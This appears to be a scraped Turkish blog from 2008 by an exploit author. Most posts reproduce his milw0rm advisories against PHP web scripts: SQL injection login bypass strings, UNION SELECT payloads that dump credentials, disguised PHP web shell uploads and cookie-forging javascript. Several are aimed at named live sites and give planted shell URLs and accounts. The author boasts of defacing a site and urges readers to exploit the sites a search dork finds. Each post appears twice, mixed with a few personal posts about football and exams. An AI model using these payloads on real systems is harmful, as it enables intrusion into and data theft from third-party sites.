passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php
ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability
ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7112
Discovered By: ZoRLu
dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) )
Exploit:
http://localhost/script/pictures/[id]your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you click to "Add a Recipe" and add recipe
and after click to "View your Recipes" click to you recipe open new page
right click to your photo. select properties copy photo lick
and paste your explorer go your shell
your_shell.php path:
http://localhost/script/pictures/[id]your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php
example 2:
user: zorlu
passwd: zorlu1
shell:
http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )
misal:
http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
link: http://www.milw0rm.com/exploits/7112
Discovered By: ZoRLu
dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) )
Exploit:
http://localhost/script/pictures/[id]your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you click to "Add a Recipe" and add recipe
and after click to "View your Recipes" click to you recipe open new page
right click to your photo. select properties copy photo lick
and paste your explorer go your shell
your_shell.php path:
http://localhost/script/pictures/[id]your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php
example 2:
user: zorlu
passwd: zorlu1
shell:
http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )
misal:
http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
13 Kasım 2008 Perşembe
Kurtlar Vadisi Pusu 46. Bölüm Fragman
polat abimiz tam dosyaları teslim edip gönderdiği zaman süper bi süpriz ile karşılaşıyor. izleyin görün. biraz da bozuluyor herhalde : ) )
TIKLA iZLE
TIKLA iZLE
AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln
AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7103
Discovered By: ZoRLu
Exploit:
username: ZoRLu
password: ' or ' 1=1--
admin login for demo:
http://www.hyperstop.com/demo/webhost/
username: ZoRLu
password: ' or ' 1=1--
link: http://www.milw0rm.com/exploits/7103
Discovered By: ZoRLu
Exploit:
username: ZoRLu
password: ' or ' 1=1--
admin login for demo:
http://www.hyperstop.com/demo/webhost/
username: ZoRLu
password: ' or ' 1=1--
AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln
AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7102
Discovered By: ZoRLu
Exploit:
localhost/script/admin/admin.php
username: ' or ' 1=1--
password: ZoRLu
admin login for demo:
http://www.blizsoft.com/article/admin/admin.php
username: ' or ' 1=1--
password: ZoRLu
link: http://www.milw0rm.com/exploits/7102
Discovered By: ZoRLu
Exploit:
localhost/script/admin/admin.php
username: ' or ' 1=1--
password: ZoRLu
admin login for demo:
http://www.blizsoft.com/article/admin/admin.php
username: ' or ' 1=1--
password: ZoRLu
AlstraSoft SendIt Pro Remote File Upload Vulnerability
AlstraSoft SendIt Pro Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7101
Discovered By: ZoRLu
dork: "Powered by AlstraSoft SendIt Pro"
Exploit:
you save your shell like this: shell.php.pjpeg
warning: filetype not php.jpeg
like this: filetype: php.pjpeg
after you go site
Recipients' e-mail address: write anything
Select file : select your_shell.php.pjpeg
Your e-mail address: email
Message to send to recipient : write anything
and click to send button after you see link and clik to that link
you go your_shell.php.pjpeg :
localhost/script/send/files/[id]shell.php.pjpeg
example for demo:
http://www.blizsoft.com/send/files/84019shell.php.pjpeg
link: http://www.milw0rm.com/exploits/7101
Discovered By: ZoRLu
dork: "Powered by AlstraSoft SendIt Pro"
Exploit:
you save your shell like this: shell.php.pjpeg
warning: filetype not php.jpeg
like this: filetype: php.pjpeg
after you go site
Recipients' e-mail address: write anything
Select file : select your_shell.php.pjpeg
Your e-mail address: email
Message to send to recipient : write anything
and click to send button after you see link and clik to that link
you go your_shell.php.pjpeg :
localhost/script/send/files/[id]shell.php.pjpeg
example for demo:
http://www.blizsoft.com/send/files/84019shell.php.pjpeg
11 Kasım 2008 Salı
a.q gecenin bu saatinde ödev hazırlıyorum : (
PHPStore Real Estate Remote File Upload Vulnerability
PHPStore Real Estate Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7085
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
---------------------------------------------
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php
http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php )
link: http://www.milw0rm.com/exploits/7085
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
---------------------------------------------
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php
http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php )
PHPStore Complete Classifieds Script File Upload Vulnerability
PHPStore Complete Classifieds Script File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7084
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and Add Listing click open the new page upload logo (upload your_shell.php)
your_shell.php path:
localhost/script/yellow_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php
http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )
link: http://www.milw0rm.com/exploits/7084
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and Add Listing click open the new page upload logo (upload your_shell.php)
your_shell.php path:
localhost/script/yellow_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php
http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )
PHPStore PHP Job Search Script Remote File Upload Vulnerability
PHPStore PHP Job Search Script Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7083
Author: ZoRLu
exploit:
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
you register site and this site questions your photo. you upload your_shell.php
you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )
you must see your photo
and right click to your photo select to properites
after copy photo link and paste your explorer go your shell
your_shell.php
http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php
---------------------------------------------
example for demo:
shell: ( not permission for demo server )
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )
link: http://www.milw0rm.com/exploits/7083
Author: ZoRLu
exploit:
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
you register site and this site questions your photo. you upload your_shell.php
you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )
you must see your photo
and right click to your photo select to properites
after copy photo link and paste your explorer go your shell
your_shell.php
http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php
---------------------------------------------
example for demo:
shell: ( not permission for demo server )
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )
PHPStore Car Dealers Remote File Upload Vulnerability
PHPStore Car Dealers Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7082
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/cars_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php
link: http://www.milw0rm.com/exploits/7082
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/cars_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php
9 Kasım 2008 Pazar
Galatasaray - fenerbahçe 4-1
ilk golü biz attık adamlar 1 e 4 attı hay a.q : ) neyse cimbomum ne diyelim geçmiş olsun canımız saolsun : ) ) yensen de yenilsen de bizim takımımızsın seni seviyoruz en büyük cimbom
Ali Kınık - Asın Beni
Ali Kınık'ın süper bir parçası tavsiye ederim dinlemenizi
"Hor görüldü sevdalarım"
"Vatan için kavgalarım"
"Ben küçülmeden yaşarım"
"isterseniz asın beni"
"Bir şafak vakti"
TIKLA iNDiR
"Hor görüldü sevdalarım"
"Vatan için kavgalarım"
"Ben küçülmeden yaşarım"
"isterseniz asın beni"
"Bir şafak vakti"
TIKLA iNDiR
8 Kasım 2008 Cumartesi
ZEEJOBSITE 2.0 Remote File Upload Vulnerability
ZEEJOBSITE 2.0 Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7062
author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )
and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/jobseekers/logos/[id].php
example for demo:
user: sabrina
passwd: testing:
login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php
change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47
and your_shell link:
http://zeejobsite.com/jobseekers/logos/7271406.php
link: http://www.milw0rm.com/exploits/7062
author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )
and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/jobseekers/logos/[id].php
example for demo:
user: sabrina
passwd: testing:
login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php
change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47
and your_shell link:
http://zeejobsite.com/jobseekers/logos/7271406.php
zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities
zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7058
author: ZoRLu
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/companylogo/[id].php
example for demo:
user: zeeways
passwd: testing:
change profile direckt link: http://www.zeeproperty.com/viewprofile.php
and your_shell link:
http://www.zeeproperty.com/companylogo/5622365.php
XSS for demo:
http://www.zeeproperty.com/view_prop_details.php?propid=[XSS]
link: http://www.milw0rm.com/exploits/7058
author: ZoRLu
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/companylogo/[id].php
example for demo:
user: zeeways
passwd: testing:
change profile direckt link: http://www.zeeproperty.com/viewprofile.php
and your_shell link:
http://www.zeeproperty.com/companylogo/5622365.php
XSS for demo:
http://www.zeeproperty.com/view_prop_details.php?propid=[XSS]
7 Kasım 2008 Cuma
DeltaScripts PHP Classifieds <= 7.5 SQL Injection Vulnerability
DeltaScripts PHP Classifieds <= 7.5 SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7047
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/detail.php?siteid=[SQL]
[SQL]=
-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
live sites:
http://www.deltascripts.com/phpclassifieds/livesites
for example:
http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
link: http://www.milw0rm.com/exploits/7047
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/detail.php?siteid=[SQL]
[SQL]=
-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
live sites:
http://www.deltascripts.com/phpclassifieds/livesites
for example:
http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability
MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7046
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/EasyCalendar/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7046
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/EasyCalendar/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
MyioSoft EasyBookMarker (Auth Bypass) SQL Injection Vulnerability
MyioSoft EasyBookMarker (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7045
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/EasyBookMarker/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7045
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/EasyBookMarker/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability
MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7044
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/AjaxPortal/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7044
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/AjaxPortal/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vuln
E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7041
author: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
for demo:
http://e-topbiz.com/trafficdemos/store1/admin/login.php
username: admin ' or ' 1=1--
password: ZoRLu
link: http://www.milw0rm.com/exploits/7041
author: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
for demo:
http://e-topbiz.com/trafficdemos/store1/admin/login.php
username: admin ' or ' 1=1--
password: ZoRLu
DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability
DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7025
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/phpshop/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7025
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/phpshop/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln
DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7024
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7024
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln
DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7023
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7023
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
5 Kasım 2008 Çarşamba
3 Kasım 2008 Pazartesi
kpss çalışcam a.q kpss : (
yav bıktım bu sınavlardan bir ara öss idi şimdi kpss : ( bütün sınavların a.q : ) )
Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
link: http://www.milw0rm.com/exploits/6969
Discovered By: ZoRLu
admin login:
http://localhost/apoll/admin/index.php
Exploit:
username: [real_admin_or_user_name] ' or ' 1=1
password: dont write anything
note: generally admin name: admin
example for my localhost:
admin: zorlu
user: salla
username: zorlu ' or ' 1=1
password: empty
or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )
username: salla ' or ' 1=1
password: empty
file:
apoll/admin/index.php
code:
$user = $_SESSION['user'];
$pass = $_SESSION['pass'];
$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
$num = @mysql_num_rows($mysql);
link: http://www.milw0rm.com/exploits/6969
Discovered By: ZoRLu
admin login:
http://localhost/apoll/admin/index.php
Exploit:
username: [real_admin_or_user_name] ' or ' 1=1
password: dont write anything
note: generally admin name: admin
example for my localhost:
admin: zorlu
user: salla
username: zorlu ' or ' 1=1
password: empty
or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )
username: salla ' or ' 1=1
password: empty
file:
apoll/admin/index.php
code:
$user = $_SESSION['user'];
$pass = $_SESSION['pass'];
$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
$num = @mysql_num_rows($mysql);
MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability
MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/6967
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/view.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
example:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
link: http://www.milw0rm.com/exploits/6967
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/view.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
example:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
BosDev BosClassifieds (cat_id) SQL Injection Vulnerability
BosDev BosClassifieds (cat_id) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/6962
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/index.php?cat_id=[SQL]
[SQL]=
-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
example 1: ( you must look title )
http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )
example 2: ( you must look title )
http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
link: http://www.milw0rm.com/exploits/6962
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/index.php?cat_id=[SQL]
[SQL]=
-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
example 1: ( you must look title )
http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )
example 2: ( you must look title )
http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
2 Kasım 2008 Pazar
Joovili 3.1.4 Insecure Cookie Handling Vulnerability
Joovili 3.1.4 Insecure Cookie Handling Vulnerability
link: http://www.milw0rm.com/exploits/6955
Discovered By: ZoRLu
demo admin login:
http://demo.joovili.com/admin
demo user login:
http://demo.joovili.com/
demo staff login:
http://demo.joovili.com/staff/
exploit for user:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
for demo user:
javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
for demo admin:
javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
for demo staff:
javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";
link: http://www.milw0rm.com/exploits/6955
Discovered By: ZoRLu
demo admin login:
http://demo.joovili.com/admin
demo user login:
http://demo.joovili.com/
demo staff login:
http://demo.joovili.com/staff/
exploit for user:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
for demo user:
javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
for demo admin:
javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
for demo staff:
javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";
Apartment Search Script (RFU/XSS) Multiple Remote Vulnerabilities
Apartment Search Script (RFU/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/6956
Discovered By: ZoRLu
exploit:
http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
XSS
http://localhost/script_path/listtest.php?r=[XSS]
example 1 (demo):
http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
example 2:
http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
XSS example:
http://www.apt.cc/listtest.php?r=[XSS]
---------------------------------------------------------------------------
you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI )
and you add this code your shell to head
GIF89a; (en uste bu kodu ekle )
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php ( isim ver ve kaydet )
----------------------------------------------------------------------------
you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )
and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )
after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )
or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )
and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )
after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )
if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )
after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy
after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla
acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )
your_shell.php
http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
-------------------------------------------------------------------------------
example 1 (demo):
http://www.downlinegoldmine.com/apartment/Member_Admin/index.php
email: zorlu@w.cn
password: 123456
or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666
edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666
and shell.php
http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
example 2:
http://www.apt.cc/Member_Admin/index.php
email: zorlu@w.cn
password: 123456
or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187
edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187
and shell.php
http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
link: http://www.milw0rm.com/exploits/6956
Discovered By: ZoRLu
exploit:
http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
XSS
http://localhost/script_path/listtest.php?r=[XSS]
example 1 (demo):
http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
example 2:
